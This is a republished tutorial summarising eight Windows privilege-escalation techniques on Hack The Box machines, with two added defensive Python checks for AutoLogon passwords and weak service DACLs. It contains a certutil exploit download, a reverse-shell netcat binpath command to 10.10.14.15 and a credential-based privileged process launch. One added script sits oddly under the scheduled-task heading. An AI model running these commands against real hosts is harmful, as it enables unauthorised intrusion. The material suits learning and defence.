8 Essential Windows Privilege‑Escalation Techniques Every Security Analyst Should Know
This guide walks through eight practical Windows privilege‑escalation methods—including manual system and user enumeration, automated tools such as WinPEAS and PowerUp, kernel exploits, WSL abuse, token impersonation, credential harvesting, scheduled‑task abuse, and weak‑service exploitation—providing step‑by‑step commands, code snippets, and real‑world Hack The Box examples.
1. Manual Enumeration
Privilege escalation begins with gathering system information. Using systeminfo in PowerShell reveals OS version, patch level, BIOS, and processor details. wmic qfe lists installed updates, helping attackers spot missing patches that may be exploitable. User enumeration with whoami, whoami /priv, and whoami /groups shows the current account and its groups. net user lists all local accounts, and net user username displays detailed properties, including password policies and group memberships. Additional enumeration of network settings, antivirus, services, and processes can be performed manually.
2. Automated Tools
Automation speeds up discovery of privilege‑escalation vectors.
WinPEAS – a color‑coded script that highlights weak folder permissions, registry rights, misconfigured services, and scheduled tasks.
PowerUp – a PowerShell script that runs all checks with Invoke-AllChecks or specific checks such as Get-UnquotedService. It may require bypassing the execution policy.
Seatbelt – part of the GhostPack suite, written in C#, collects system and user data useful for identifying escalation paths.
SharpUp – a C# port of many PowerUp checks, allowing single‑check or full audits.
Windows Exploit Suggester – a Python tool that compares the system’s patch level against Microsoft’s vulnerability database to suggest missing patches that could be leveraged.
3. Kernel Exploits
Kernel vulnerabilities, such as MS10‑059 ("Chimichurri"), allow attackers to obtain SYSTEM privileges. The article demonstrates downloading the exploit from the SecWiki repository, serving it via a Python HTTP server, and executing it against a vulnerable target on the Hack The Box "Devel" machine. After establishing a reverse shell with Netcat, systeminfo output is saved and fed to Windows Exploit Suggester to identify applicable kernel exploits.
python3 -m http.server
certutil -urlcache -f http://10.10.14.10:8000/MS10-059.exe MS10-059.exe
4. Using Windows Subsystem for Linux (WSL)
When WSL runs as root, it can be leveraged to spawn a higher‑privileged shell. The guide locates bash.exe with where /R C:\Windows bash.exe, executes it from C:\Windows\System32, and then runs python3 -c 'import pty;pty.spawn("/bin/bash")' to obtain a full Linux shell. Linux enumeration commands and bash history reveal stored Windows credentials, which can be used with psexec to gain a SYSTEM shell.
5. Token Impersonation (Juicy Potato)
Token stealing attacks replace a low‑privilege token with a high‑privilege one. The article uses the Juicy Potato exploit (effective on Windows versions prior to Server 2019/10 1809) against the Hack The Box "Bounty" machine. After setting up a Python HTTP server, the exploit binary is downloaded via certutil, executed, and a reverse shell is obtained.
python3 -m http.server
6. Credential Harvesting (AutoLogon)
Windows can store AutoLogon credentials in the registry in plain text. Using WinPEAS on the Hack The Box "Chatterbox" machine reveals an AutoLogon password that works for the Administrator account. The password is then used to create a PSCredential object and launch shell.exe with elevated rights.
powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator',$password); Start-Process -FilePath 'shell.exe' -Credential $creds"
7. Scheduled‑Task Abuse
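A defender's check for the AutoLogon weakness described above, added here as an example and not code from the original guide: it parses the output of reg query on the Winlogon key (the sample output below is constructed; the password value is the article's example, not a real credential) and reports whether a plain-text DefaultPassword is present.

```python
import re

# Registry key where Windows keeps AutoLogon settings.
WINLOGON_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed sample of what `reg query "<WINLOGON_KEY>"` prints on a host with
# AutoLogon configured. Not captured from a real machine.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    CHATTERBOX
    DefaultUserName    REG_SZ    Administrator
    DefaultPassword    REG_SZ    Welcome1!
    Shell    REG_SZ    explorer.exe
"""

# Value lines are indented and use runs of spaces between name, type and data.
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")


def parse_reg_query(text):
    """Map value name -> data for every value line in reg query output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values[m.group("name")] = m.group("data").strip()
    return values


def autologon_finding(values):
    """Classify the Winlogon values:
    'plaintext'  - DefaultPassword is readable in the registry (the weakness WinPEAS flags)
    'lsa-secret' - AutoLogon is on but no registry DefaultPassword, i.e. the password is
                   most likely stored as an LSA secret (how Sysinternals Autologon saves it)
    None         - AutoLogon not configured
    """
    if "DefaultPassword" in values:
        return "plaintext"
    if values.get("AutoAdminLogon") == "1":
        return "lsa-secret"
    return None


if __name__ == "__main__":
    finding = autologon_finding(parse_reg_query(SAMPLE_REG_QUERY))
    print(WINLOGON_KEY, "->", finding)
```

A 'plaintext' result is the condition to remediate: remove the DefaultPassword value (or reconfigure AutoLogon so the password lives in the LSA secret) and rotate the exposed account password.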
Scheduled tasks run with the privileges of the creating user, often SYSTEM. The article shows a task on the Hack The Box "Tally" machine that executes a PowerShell script (SPBestWarmUp.ps1) hourly with -ExecutionPolicy Bypass. By modifying the script to download a reverse shell and waiting for the next run, an elevated shell is obtained.
8. Weak Service Permissions
Services running with high privileges can be abused if their ACLs allow modification. The guide demonstrates on the Hack The Box "Querier" machine how to replace the binary path of the UsoSvc service with a Netcat command (nc.exe -e cmd.exe 10.10.14.15 4444) using sc config. After restarting the service, a SYSTEM shell is received.
sc config UsoSvc binpath= "C:\Reports\nc.exe -e cmd.exe 10.10.14.15 4444"
Each method includes concrete commands, code snippets, and screenshots to illustrate the exploitation steps. The guide emphasizes careful verification of permissions, patch levels, and service configurations before attempting escalation.
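The service-permission weakness in section 8 (and the service checks WinPEAS and PowerUp automate in section 2) comes down to the service DACL granting a low-privileged principal SERVICE_CHANGE_CONFIG or a comparable right. The audit below is an added example, not code from the original guide: it parses SDDL strings in the form sc sdshow prints them (the sample strings are constructed, not captured from a real host) and flags the ACEs that would let Everyone, Authenticated Users, Users or Interactive users reconfigure a service.

```python
import re

# Well-known SID abbreviations that mean "any low-privileged user" (not exhaustive).
LOW_PRIV = {"WD": "Everyone", "AU": "Authenticated Users", "BU": "Users",
            "IU": "Interactive Users", "AN": "Anonymous"}

# Rights that let such a user reconfigure or take over a service object:
# DC = SERVICE_CHANGE_CONFIG (rewrite binPath), SD = DELETE, WD = WRITE_DAC,
# WO = WRITE_OWNER, GA / GW = GENERIC_ALL / GENERIC_WRITE.
TAKEOVER = {"DC", "SD", "WD", "WO", "GA", "GW"}
# The same rights when sc sdshow prints the access mask as a hex number instead.
TAKEOVER_BITS = {0x2: "DC", 0x10000: "SD", 0x40000: "WD", 0x80000: "WO",
                 0x10000000: "GA", 0x40000000: "GW"}

# One SDDL ACE: (type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[^;]*);;;(?P<sid>[^)]+)\)")


def rights_of(field):
    """Expand an ACE rights field ('CCDCLC...' or '0x40002') to a set of two-letter codes."""
    if field.startswith("0x"):
        mask = int(field, 16)
        return {name for bit, name in TAKEOVER_BITS.items() if mask & bit}
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def dangerous_aces(sddl):
    """Return [(trustee, [rights])] for every allow ACE in the DACL that grants a
    low-privileged principal a TAKEOVER right. Deny ACEs and the SACL are ignored."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]
    findings = []
    for ace in ACE_RE.finditer(dacl):
        if ace.group("type") != "A" or ace.group("sid") not in LOW_PRIV:
            continue
        bad = sorted(rights_of(ace.group("rights")) & TAKEOVER)
        if bad:
            findings.append((LOW_PRIV[ace.group("sid")], bad))
    return findings


def weak_services(sdshow_output):
    """Names of services (name -> `sc sdshow` SDDL) whose DACL yields a finding."""
    return [name for name, sddl in sdshow_output.items() if dangerous_aces(sddl)]


# Constructed samples: a default-style service DACL, and one that lets Authenticated
# Users change the configuration, the condition the article describes for UsoSvc.
SAMPLE_SDSHOW = {
    "HealthySvcExample": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                         "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                         "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "UsoSvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
              "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)",
}

if __name__ == "__main__":
    for name in weak_services(SAMPLE_SDSHOW):
        print(name, dangerous_aces(SAMPLE_SDSHOW[name]))
```

To run it against a real host, feed the dictionary with the output of sc sdshow for each service; a finding means the DACL should be reset so that only SYSTEM and Administrators hold DC, WD and WO.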
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact and we will review it promptly.
ITPUB
Official ITPUB account sharing technical insights, community news, and exciting events.